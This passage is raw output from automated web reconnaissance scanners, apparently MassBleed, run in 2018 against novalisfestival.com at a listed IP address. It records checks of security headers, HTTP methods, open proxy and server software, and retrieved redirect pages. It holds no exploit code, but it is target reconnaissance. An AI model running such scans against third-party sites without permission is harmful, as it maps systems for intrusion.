3766. OpenSSL 1.0.2e TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, 256 bit ECDH (P-256)
3767.  
3768.  Done 2018-01-05 14:29:38 [ 249s] -->> 185.119.174.103:443 (novalisfestival.com) <<--
3769.  
3770.  
3771.  
3772. ███▄ ▄███▓ ▄▄▄ ██████ ██████ ▄▄▄▄ ██▓ ▓█████ ▓█████ ▓█████▄ 
3773. ▓██▒▀█▀ ██▒▒████▄ ▒██ ▒ ▒██ ▒ ▓█████▄ ▓██▒ ▓█ ▀ ▓█ ▀ ▒██▀ ██▌
3774. ▓██ ▓██░▒██ ▀█▄ ░ ▓██▄ ░ ▓██▄ ▒██▒ ▄██▒██░ ▒███ ▒███ ░██ █▌
3775. ▒██ ▒██ ░██▄▄▄▄██ ▒ ██▒ ▒ ██▒▒██░█▀ ▒██░ ▒▓█ ▄ ▒▓█ ▄ ░▓█▄ ▌
3776. ▒██▒ ░██▒ ▓█ ▓██▒▒██████▒▒▒██████▒▒░▓█ ▀█▓░██████▒░▒████▒░▒████▒░▒████▓ 
3777. ░ ▒░ ░ ░ ▒▒ ▓▒█░▒ ▒▓▒ ▒ ░▒ ▒▓▒ ▒ ░░▒▓███▀▒░ ▒░▓ ░░░ ▒░ ░░░ ▒░ ░ ▒▒▓ ▒ 
3778. ░ ░ ░ ▒ ▒▒ ░░ ░▒ ░ ░░ ░▒ ░ ░▒░▒ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ▒ ▒ 
3779. ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ 
3780. ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ 
3781. ░ ░ 
3782. + -- --=[MÄŚŚBĻËËĐ V20160303 BÅž 1Ņ3 @ ĊŖÖŎĐŚȞÏËĻĐ - https://crowdshield.com
3783. + -- --=[Scan Complete!
3784.  + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +
3785. + -- --=[Checking if X-Content options are enabled on novalisfestival.com... 
3786.  
3787. + -- --=[Checking if X-Frame options are enabled on novalisfestival.com... 
3788.  
3789. + -- --=[Checking if X-XSS-Protection header is enabled on novalisfestival.com... 
3790.  
3791. + -- --=[Checking HTTP methods on novalisfestival.com... 
3792.  
3793. + -- --=[Checking if TRACE method is enabled on novalisfestival.com... 
3794.  
3795. + -- --=[Checking for META tags on novalisfestival.com... 
3796.  
3797. + -- --=[Checking for open proxy on novalisfestival.com... 
3798.  
3799. + -- --=[Enumerating software on novalisfestival.com... 
3800. Server: nginx
3801.  
3802. + -- --=[Checking if Strict-Transport-Security is enabled on novalisfestival.com... 
3803.  
3804. + -- --=[Checking for Flash cross-domain policy on novalisfestival.com... 
3805. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
3806. <html><head>
3807. <title>301 Moved Permanently</title>
3808. </head><body>
3809. <h1>Moved Permanently</h1>
3810. <p>The document has moved <a href="http://www.novalisfestival.com/crossdomain.xml">here</a>.</p>
3811. </body></html>
3812.  
3813. + -- --=[Checking for Silverlight cross-domain policy on novalisfestival.com... 
3814. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
3815. <html><head>
3816. <title>301 Moved Permanently</title>
3817. </head><body>
3818. <h1>Moved Permanently</h1>
3819. <p>The document has moved <a href="http://www.novalisfestival.com/clientaccesspolicy.xml">here</a>.</p>
3820. </body></html>
3821.  
3822. + -- --=[Checking for HTML5 cross-origin resource sharing on novalisfestival.com... 
3823.  
3824. + -- --=[Retrieving robots.txt on novalisfestival.com... 
3825. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
3826. <html><head>
3827. <title>301 Moved Permanently</title>
3828. </head><body>
3829. <h1>Moved Permanently</h1>
3830. <p>The document has moved <a href="http://www.novalisfestival.com/robots.txt">here</a>.</p>
3831. </body></html>
3832.  
3833. + -- --=[Retrieving sitemap.xml on novalisfestival.com... 
3834. <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
3835. <html><head>
3836. <title>301 Moved Permanently</title>
3837. </head><body>
3838. <h1>Moved Permanently</h1>
3839. <p>The document has moved <a href="http://www.novalisfestival.com/sitemap.xml">here</a>.</p>
3840. </body></html>
3841.  
3842. + -- --=[Checking cookie attributes on novalisfestival.com... 
3843.  
3844. + -- --=[Checking for ASP.NET Detailed Errors on novalisfestival.com... 
3845. #######################################################################################################################################